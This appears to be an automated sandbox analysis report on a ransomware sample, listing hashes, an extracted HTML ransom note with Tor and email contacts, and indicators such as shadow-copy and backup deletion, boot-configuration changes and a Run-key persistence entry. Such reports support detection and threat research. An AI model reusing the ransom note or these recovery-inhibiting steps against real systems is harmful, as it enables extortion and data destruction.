a1082d01ede1f5fa700be2420ec96047a699d0579c15ddb2f54233a24ac3a7e9

Analysis

max time kernel
149s
max time network
119s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
01-01-2024 14:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
Size

334KB
MD5

4d8bdcee20a3de89ba08bd09cd4ea642
SHA1

cc4ddf3a821eb13db3d45ed7e4b0b2ed35c2a22e
SHA256

902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016
SHA512

024944b3910f72e80d1436627812fefb7bd4b4f3e9d541a747d549743a8edc5f279a0abf45fab6b3fc5ce47eea00b22958efa04513095c86c42efe24c450f28d
SSDEEP

6144:bkv89W2QcboLPlZvqEKvSlvgXCBVnTDg3GV06rPnek63AW1g3yEXq:bk09XelZvqEKv8gXCBlPHeByyEXq

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Path

F:\HOW_TO_BACK_FILES.html

Ransom Note

<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">QKcWmXBd0C5Scu1QCu0fOGeng5lhoHAN7yDaQr1LWBX7uEHx8ycOAF6Qe86cOQd3+KGftikW57ipG2aW4eiNMTO/xzl4G0T4tlJJ/ppEeUgoyu8ThkJsbLAcAlFS/zuirKl/8jc40KQHTuAArHjxnQgq8+WbUlSL0pok8EsqdRYJEkN/dKp2+vRVn/0+dEGGGOYoNEYgZgRfAG2GIk2My8EmIa0oe4WJrj5W5ZglQNmN6gTf6e6WGSc/Ilft1xSjo6+XbKhe7TRDtTE/I6NQWpgln/Ggn9wSaYEyO/+aKhDCope+W64ke86TziUrVnM9iEsdufIw2rIDtLUf2RcTCC/wgOmQPefco72uKcLGzDNH2FzZutNkJmJI73bNEQtO523PcAxS+Qk2gEJCaXnKwEqWomSl5nngQ4Um8Mo8ZhksfHJWh8a5JU6KAWegjt4+tmolxz8M5GjSqK/Z4DKY7so5RDy5eWOr9xCxFMu6QWUdzP/9j3OT8bhaWmBq07Wr3JXF68A7opI/g0gkDGfLz/6dUIq2fgd5JU7AP76wXqlAJ7nmHLuZljiSd6MQyryrx1sXxkWDj4uvaCavb+2lrl1Ycn1uSEWRFi68onX/QnjdzO9i77gn/NEgSwEZzmervJW/hH70+3HbimZV3jOPSoCrW+JGiXxng2+KwdeObVy1HsST56655n3jpM05dYONOBQLEbKr4GUx2rVDKuRAI9QP3stS2ysGbePDcugMgJcCge6iwQkP9TZ2giYA2VAkYx1p1BQeRmciYtbUpBOwygGjnigdnjcnPNeQGNSX7u6rwqrHYaGBL7jDZWgVwrLurPOxyZdHndyWgQYXe6wFYjlq8sGhtuvZA4oCSeVWLQqRrwiGNp9DmBcaJXYvjphMf1w5Tr53LjpU09akSPRc7SZ+AB5HeZHethiylxSpnAjMlDmA1VCNSKJnbR3JsOlVFmpserJDcmzHsKh5BXu4phipSJIzzbA6DyhdH+oCkLro8QEbRpMsgAfkSreWLcAtKKdZN7dks8eyqNKpduPRUJDOBuve3HeLgFXWpkInDdEp+Bzs0x1tyHs6R+tNLa3o8a1CLXWPM9Ai/9KwDji7Xd3munaHtxaZ7wB+BRNZ7QLMKsPB416aI9JvxtmhN08yEqsdTO8c6lso+2mqkHCKccEOXkgY5qA+SymCLqB/DCUk1bCQYkCebREFFfLL4uTD8HwUv9WGNweCTMBRHjzljTSAUwanEC/CYshgS4bU0qlwUmhS+r05qe523uy0UKQCXZWJCqkOkZRqEtxd1QsjzIxy/dTiAyqCQhCBj22eP4mnm21+/CcEOJ3wyZjZTX+3yM85+joqB7Sb8XzdXmTKLxeR7KCaYJwlU1r1zMad7LwJMDsx25Gu/n+ZCUg7F1RpkwQNCuneanCxodkzUEzIstSKWj/oir4KXh/6lpu+EgyT9irR9KEiS1yeiHa2JD4y6GPA0KM6gYsWWfliTodXeIudTvmZg+8vCy4JmCwxNgTgIUgqktRgXHVRDuEOcmU1wP9D9R02qOSry6wGRxxQAVchpr1LVFsV1jcUhNbjIFCdXnzw0Ukasge4g3fAJ+A/4zci4P3JcxjlcuZqqaroCEzrAD0VeFk305lS4ThPAn7exiVNsHVDcduGyjSSDshODSXxlpMughIHUVWf9IZ9Lgmx36k4suq7CZ5OmpluqGM=</span> <br>  </div> </div>  <div class="tabs">  <div class="tab"> <div id="tab-content1" class="content"> <div class="text">  <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br>  <hr> <b>Contact us for price and get decryption software.</b><br><br> <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br> * Note that this server is available via Tor browser only<br><br> Follow the instructions to open the link:<br> 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site.<br> 2. Press "Download Tor", then press "Download Tor Browser Bundle", install and run it.<br> 3. Now you have Tor browser. In the Tor Browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. Start a chat and follow the further instructions. <br> <hr> <b>If you can not use the above link, use the email:</b><br> <a href="[email protected] ">[email protected] </a> <br> <a href="[email protected] ">[email protected] </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> </div> </div> </div>   </div> </div>  </div> </div> </body> </html>

Emails

href="[email protected]

">[email protected]

href="[email protected]

">[email protected]

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2536 created 1196	2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe	19

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2364	bcdedit.exe
2848	bcdedit.exe

Renames multiple (7557) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Deletes System State backups 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2464	wbadmin.exe

Deletes system backups 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
1580	wbadmin.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe\""	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe\""	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe

Enumerates connected drives 3 TTPs 26 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\Q:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\N:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\Z:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\F:	cipher.exe
File opened (read-only)	\??\S:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\T:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\F:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\G:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\M:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\B:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\O:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\W:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\K:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\V:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\Y:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\A:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\R:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\X:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\A:	cipher.exe
File opened (read-only)	\??\E:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\L:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\U:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\H:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\I:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened (read-only)	\??\P:	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-foreground.png	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_ja.jar	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\HOW_TO_BACK_FILES.html	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\HOW_TO_BACK_FILES.html	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_lrg_sml.png	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107708.WMF	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00806_.WMF	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Earthy.gif	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\js\init.js	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.bat	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB_COL.HXT	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\cpu.html	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\LISTS\BASMLA.XSL	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Windows NT\Accessories\es-ES\wordpad.exe.mui	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_pressed.png	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\OCEAN_01.MID	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLTS.DAT	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\Tasks.accdt	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.SF	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Beulah	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\de-DE\Solitaire.exe.mui	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Publisher.en-us\HOW_TO_BACK_FILES.html	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Americana\HOW_TO_BACK_FILES.html	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-cn.txt	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\it-IT\msdaprsr.dll.mui	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\35.png	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\en-US\msdaorar.dll.mui	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\RADIO.JPG	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB11.BDR	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-12	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter_partly-cloudy.png	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\HOW_TO_BACK_FILES.html	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21318_.GIF	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Office Word 2003 Look.dotx	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mr.txt	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.htm	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\kn.pak	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File created	C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\HOW_TO_BACK_FILES.html	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File created	C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\HOW_TO_BACK_FILES.html	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EDGE\THMBNAIL.PNG	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187815.WMF	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Aspect.thmx	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SIGNL.ICO	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKREQS.ICO	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\settings.html	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\SmallLogoDev.png	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SATIN\THMBNAIL.PNG	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN00914_.WMF	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\css\HOW_TO_BACK_FILES.html	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiler.xml	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\HOW_TO_BACK_FILES.html	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02384_.WMF	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Los_Angeles	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_ja.jar	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\calendar.html	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14794_.GIF	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File created	C:\Program Files (x86)\Windows NT\TableTextService\es-ES\HOW_TO_BACK_FILES.html	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\SWBELL.NET.XML	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\XLCPRTID.XML	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2628	vssadmin.exe

Kills process with taskkill 14 IoCs

evasion

pid	Process
2876	taskkill.exe
2488	taskkill.exe
2596	taskkill.exe
2096	taskkill.exe
1768	taskkill.exe
352	taskkill.exe
2900	taskkill.exe
2812	taskkill.exe
2572	taskkill.exe
796	taskkill.exe
2472	taskkill.exe
2764	taskkill.exe
2920	taskkill.exe
1108	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
2536	902afe35c6ca794e8b436dad7edf142d2492abe3907055e4bd5e85ce6f617016.exe
